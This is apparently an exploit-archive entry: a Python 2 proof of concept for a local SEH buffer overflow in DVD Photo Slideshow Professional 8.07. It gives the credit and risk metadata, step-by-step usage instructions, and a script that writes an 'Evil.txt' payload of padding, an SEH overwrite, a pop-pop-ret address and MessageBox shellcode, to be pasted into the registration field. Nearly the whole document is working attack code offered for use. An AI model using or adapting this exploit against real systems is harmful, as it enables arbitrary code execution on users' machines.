DVD Photo Slideshow Professional 8.07 Buffer Overflow

2018.09.09
Credit: T3jv1l
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit Title: DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH) # Date: 2018-09-06 # Exploit Author:T3jv1l # Vendor Homepage:http://www.dvd-photo-slideshow.com/ # Software:www.dvd-photo-slideshow.com/dps_install.exe # Category:Local # Contact:https://twitter.com/T3jv1l # Version: DVD Photo Slideshow Professional 8.07 # Tested on: Windows 7 SP1 x86 # Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ #!/bin/python print""" #1. Download and install the setup file #2. Run this exploit code via python 2.7 #3. A file "Evil.txt" will be created #4. Click Help > Register... in tool bar #5. Copy the contents of the file (Evil.txt)and paste in the Registration Name field #6. Click Activate and BOOMMMM !!!! """ import struct junk_byte = "A" * 256 nseh = "\x90\x90\xeb\x10" seh = struct.pack("<L",0x100152c9) # 0x100152c9 : pop edi # pop esi # ret nop = "\x90" *24 #Windows - MessageBox + Null-Free Shellcode (113 bytes) : BrokenByte buf = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") crash = "T" * (4000 -len(junk_byte+nseh+seh+nop+buf)) exploit = junk_byte + nseh + seh + nop + buf + crash try: f=open("Evil.txt","w") f.write(exploit) f.close() except: print "[+] File cannot be created"


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